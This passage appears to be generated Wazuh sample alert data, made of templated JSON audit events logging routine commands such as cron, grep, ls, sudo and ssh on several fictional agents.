/usr/sbin/crond","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"004","name":"Ubuntu","ip":"47.204.15.21"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/etc/sample/file"},"exe":"/usr/sbin/crond","command":"cron","success":"yes","cwd":"/home/wazuh","type":"NORMAL"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80784","firedtimes":11,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/id","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"004","name":"Ubuntu","ip":"47.204.15.21"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/usr/bin/id"},"exe":"/usr/sbin/id","command":"id","success":"yes","cwd":"/home/wazuh","type":"NORMAL"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80791","firedtimes":1,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/crond","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"001","name":"RHEL7","ip":"187.54.247.68"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/etc/sample/file"},"exe":"/usr/sbin/crond","command":"cron","success":"yes","cwd":"/home/wazuh","type":"NORMAL"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80791","firedtimes":13,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/grep","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"001","name":"RHEL7","ip":"187.54.247.68"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/usr/bin/grep"},"exe":"/usr/sbin/grep","command":"grep","success":"yes","cwd":"/home/wazuh","type":"EXECVE"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80791","firedtimes":3,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/ssh","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"003","name":"ip-10-0-0-180.us-west-1.compute.internal","ip":"10.0.0.180"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/var/sample"},"exe":"/usr/sbin/sshd","command":"ssh","success":"yes","cwd":"/home/wazuh","type":"NORMAL"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80791","firedtimes":13,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/grep","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"004","name":"Ubuntu","ip":"47.204.15.21"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/usr/bin/grep"},"exe":"/usr/sbin/grep","command":"grep","success":"yes","cwd":"/home/wazuh","type":"EXECVE"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80791","firedtimes":1,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/crond","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"002","name":"Amazon","ip":"145.80.240.15"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/etc/sample/file"},"exe":"/usr/sbin/crond","command":"cron","success":"yes","cwd":"/home/wazuh","type":"NORMAL"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80784","firedtimes":13,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/hostname","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"007","name":"Debian","ip":"24.273.97.14"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/usr/bin/hostname"},"exe":"/usr/sbin/hostname","command":"hostname","success":"yes","cwd":"/home/wazuh","type":"NORMAL"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80784","firedtimes":13,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/hostname","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"003","name":"ip-10-0-0-180.us-west-1.compute.internal","ip":"10.0.0.180"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/usr/bin/hostname"},"exe":"/usr/sbin/hostname","command":"hostname","success":"yes","cwd":"/home/wazuh","type":"NORMAL"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80784","firedtimes":6,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/ls","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"003","name":"ip-10-0-0-180.us-west-1.compute.internal","ip":"10.0.0.180"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/etc/samplefile"},"exe":"/usr/sbin/ls","command":"ls","success":"yes","cwd":"/home/wazuh","type":"PROCTITLE"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80784","firedtimes":6,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/ls","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"006","name":"Windows","ip":"207.45.34.78"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/etc/samplefile"},"exe":"/usr/sbin/ls","command":"ls","success":"yes","cwd":"/home/wazuh","type":"PROCTITLE"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80791","firedtimes":13,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/grep","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"003","name":"ip-10-0-0-180.us-west-1.compute.internal","ip":"10.0.0.180"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/usr/bin/grep"},"exe":"/usr/sbin/grep","command":"grep","success":"yes","cwd":"/home/wazuh","type":"EXECVE"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80784","firedtimes":11,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/id","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"002","name":"Amazon","ip":"145.80.240.15"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/usr/bin/id"},"exe":"/usr/sbin/id","command":"id","success":"yes","cwd":"/home/wazuh","type":"NORMAL"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80790","firedtimes":1,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/bash","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"001","name":"RHEL7","ip":"187.54.247.68"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/bin/bash"},"exe":"/usr/sbin/bash","command":"bash","success":"yes","cwd":"/home/wazuh","type":"PATH"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80791","firedtimes":1,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/crond","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"002","name":"Amazon","ip":"145.80.240.15"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/etc/sample/file"},"exe":"/usr/sbin/crond","command":"cron","success":"yes","cwd":"/home/wazuh","type":"NORMAL"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80790","firedtimes":17,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/sh","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"003","name":"ip-10-0-0-180.us-west-1.compute.internal","ip":"10.0.0.180"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/usr/bin/sh"},"exe":"/usr/sbin/sh","command":"sh","success":"yes","cwd":"/home/sh","type":"PATH"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80791","firedtimes":13,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/grep","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"001","name":"RHEL7","ip":"187.54.247.68"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/usr/bin/grep"},"exe":"/usr/sbin/grep","command":"grep","success":"yes","cwd":"/home/wazuh","type":"EXECVE"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80791","firedtimes":1,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/crond","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"005","name":"Centos","ip":"197.17.1.4"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/etc/sample/file"},"exe":"/usr/sbin/crond","command":"cron","success":"yes","cwd":"/home/wazuh","type":"NORMAL"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80790","firedtimes":17,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/sh","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"004","name":"Ubuntu","ip":"47.204.15.21"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/usr/bin/sh"},"exe":"/usr/sbin/sh","command":"sh","success":"yes","cwd":"/home/sh","type":"PATH"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80791","firedtimes":13,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/grep","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"003","name":"ip-10-0-0-180.us-west-1.compute.internal","ip":"10.0.0.180"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/usr/bin/grep"},"exe":"/usr/sbin/grep","command":"grep","success":"yes","cwd":"/home/wazuh","type":"EXECVE"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80784","firedtimes":12,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/sudo","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"001","name":"RHEL7","ip":"187.54.247.68"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/var/sample"},"exe":"/usr/sbin/sudo","command":"sudo","success":"yes","cwd":"/home/wazuh","type":"CWD"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80784","firedtimes":6,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/ls","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"003","name":"ip-10-0-0-180.us-west-1.compute.internal","ip":"10.0.0.180"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/etc/samplefile"},"exe":"/usr/sbin/ls","command":"ls","success":"yes","cwd":"/home/wazuh","type":"PROCTITLE"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80791","firedtimes":3,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/ssh","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"007","name":"Debian","ip":"24.273.97.14"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/var/sample"},"exe":"/usr/sbin/sshd","command":"ssh","success":"yes","cwd":"/home/wazuh","type":"NORMAL"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80791","firedtimes":13,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/grep","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"002","name":"Amazon","ip":"145.80.240.15"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/usr/bin/grep"},"exe":"/usr/sbin/grep","command":"grep","success":"yes","cwd":"/home/wazuh","type":"EXECVE"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80790","firedtimes":17,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/sh","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"005","name":"Centos","ip":"197.17.1.4"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/usr/bin/sh"},"exe":"/usr/sbin/sh","command":"sh","success":"yes","cwd":"/home/sh","type":"PATH"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80784","firedtimes":12,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/sudo","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"001","name":"RHEL7","ip":"187.54.247.68"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/var/sample"},"exe":"/usr/sbin/sudo","command":"sudo","success":"yes","cwd":"/home/wazuh","type":"CWD"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80791","firedtimes":13,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/grep","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"001","name":"RHEL7","ip":"187.54.247.68"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/usr/bin/grep"},"exe":"/usr/sbin/grep","command":"grep","success":"yes","cwd":"/home/wazuh","type":"EXECVE"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80790","firedtimes":1,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/bash","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"007","name":"Debian","ip":"24.273.97.14"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/bin/bash"},"exe":"/usr/sbin/bash","command":"bash","success":"yes","cwd":"/home/wazuh","type":"PATH"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80790","firedtimes":1,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/bash","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"005","name":"Centos","ip":"197.17.1.4"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/bin/bash"},"exe":"/usr/sbin/bash","command":"bash","success":"yes","cwd":"/home/wazuh","type":"PATH"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80790","firedtimes":17,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/sh","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"004","name":"Ubuntu","ip":"47.204.15.21"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/usr/bin/sh"},"exe":"/usr/sbin/sh","command":"sh","success":"yes","cwd":"/home/sh","type":"PATH"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80790","firedtimes":17,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/sh","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"005","name":"Centos","ip":"197.17.1.4"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/usr/bin/sh"},"exe":"/usr/sbin/sh","command":"sh","success":"yes","cwd":"/home/sh","type":"PATH"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80784","firedtimes":11,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/id","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"002","name":"Amazon","ip":"145.80.240.15"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/usr/bin/id"},"exe":"/usr/sbin/id","command":"id","success":"yes","cwd":"/home/wazuh","type":"NORMAL"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80791","firedtimes":13,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/grep","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"002","name":"Amazon","ip":"145.80.240.15"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/usr/bin/grep"},"exe":"/usr/sbin/grep","command":"grep","success":"yes","cwd":"/home/wazuh","type":"EXECVE"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80790","firedtimes":1,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/bash","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"006","name":"Windows","ip":"207.45.34.78"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/bin/bash"},"exe":"/usr/sbin/bash","command":"bash","success":"yes","cwd":"/home/wazuh","type":"PATH"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80784","firedtimes":16,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/consoletype","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"006","name":"Windows","ip":"207.45.34.78"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/sbin/consoletype"},"exe":"/usr/sbin/consoletype","command":"consoletype","success":"yes","cwd":"/home/wazuh","type":"PATH"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80791","firedtimes":3,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/ssh","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"004","name":"Ubuntu","ip":"47.204.15.21"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/var/sample"},"exe":"/usr/sbin/sshd","command":"ssh","success":"yes","cwd":"/home/wazuh","type":"NORMAL"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80791","firedtimes":1,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/crond","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"003","name":"ip-10-0-0-180.us-west-1.compute.internal","ip":"10.0.0.180"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/etc/sample/file"},"exe":"/usr/sbin/crond","command":"cron","success":"yes","cwd":"/home/wazuh","type":"NORMAL"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80791","firedtimes":1,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/crond","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"001","name":"RHEL7","ip":"187.54.247.68"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/etc/sample/file"},"exe":"/usr/sbin/crond","command":"cron","success":"yes","cwd":"/home/wazuh","type":"NORMAL"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80790","firedtimes":1,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/bash","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"002","name":"Amazon","ip":"145.80.240.15"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/bin/bash"},"exe":"/usr/sbin/bash","command":"bash","success":"yes","cwd":"/home/wazuh","type":"PATH"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80784","firedtimes":6,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/ls","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"003","name":"ip-10-0-0-180.us-west-1.compute.internal","ip":"10.0.0.180"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/etc/samplefile"},"exe":"/usr/sbin/ls","command":"ls","success":"yes","cwd":"/home/wazuh","type":"PROCTITLE"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80784","firedtimes":16,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/consoletype","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"003","name":"ip-10-0-0-180.us-west-1.compute.internal","ip":"10.0.0.180"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/sbin/consoletype"},"exe":"/usr/sbin/consoletype","command":"consoletype","success":"yes","cwd":"/home/wazuh","type":"PATH"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80784","firedtimes":6,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/ls","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"004","name":"Ubuntu","ip":"47.204.15.21"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/etc/samplefile"},"exe":"/usr/sbin/ls","command":"ls","success":"yes","cwd":"/home/wazuh","type":"PROCTITLE"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80784","firedtimes":11,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/id","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"002","name":"Amazon","ip":"145.80.240.15"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/usr/bin/id"},"exe":"/usr/sbin/id","command":"id","success":"yes","cwd":"/home/wazuh","type":"NORMAL"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80790","firedtimes":17,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/sh","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"005","name":"Centos","ip":"197.17.1.4"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/usr/bin/sh"},"exe":"/usr/sbin/sh","command":"sh","success":"yes","cwd":"/home/sh","type":"PATH"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80784","firedtimes":16,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/consoletype","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"006","name":"Windows","ip":"207.45.34.78"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/sbin/consoletype"},"exe":"/usr/sbin/consoletype","command":"consoletype","success":"yes","cwd":"/home/wazuh","type":"PATH"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80784","firedtimes":12,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/sudo","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"005","name":"Centos","ip":"197.17.1.4"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/var/sample"},"exe":"/usr/sbin/sudo","command":"sudo","success":"yes","cwd":"/home/wazuh","type":"CWD"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80790","firedtimes":17,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/sh","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"003","name":"ip-10-0-0-180.us-west-1.compute.internal","ip":"10.0.0.180"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/usr/bin/sh"},"exe":"/usr/sbin/sh","command":"sh","success":"yes","cwd":"/home/sh","type":"PATH"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80791","firedtimes":3,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/ssh","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"003","name":"ip-10-0-0-180.us-west-1.compute.internal","ip":"10.0.0.180"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/var/sample"},"exe":"/usr/sbin/sshd","command":"ssh","success":"yes","cwd":"/home/wazuh","type":"NORMAL"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80784","firedtimes":12,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/sudo","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"002","name":"Amazon","ip":"145.80.240.15"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/var/sample"},"exe":"/usr/sbin/sudo","command":"sudo","success":"yes","cwd":"/home/wazuh","type":"CWD"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80784","firedtimes":6,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/ls","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"007","name":"Debian","ip":"24.273.97.14"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/etc/samplefile"},"exe":"/usr/sbin/ls","command":"ls","success":"yes","cwd":"/home/wazuh","type":"PROCTITLE"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80791","firedtimes":3,"mail":false,"level":3,"description":"Audit: Command: /usr/sbin/ssh","groups":["audit","audit_command"],"gdpr":["IV_30.1.g"]},"agent":{"id":"005","name":"Centos","ip":"197.17.1.4"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{"audit":{"file":{"name":"/var/sample"},"exe":"/usr/sbin/sshd","command":"ssh","success":"yes","cwd":"/home/wazuh","type":"NORMAL"}},"location":""} +{"timestamp":"{timestamp}","rule":{"id":"80791","firedtimes":1,"mail":false,"level":3,"description":"Audit: Command: 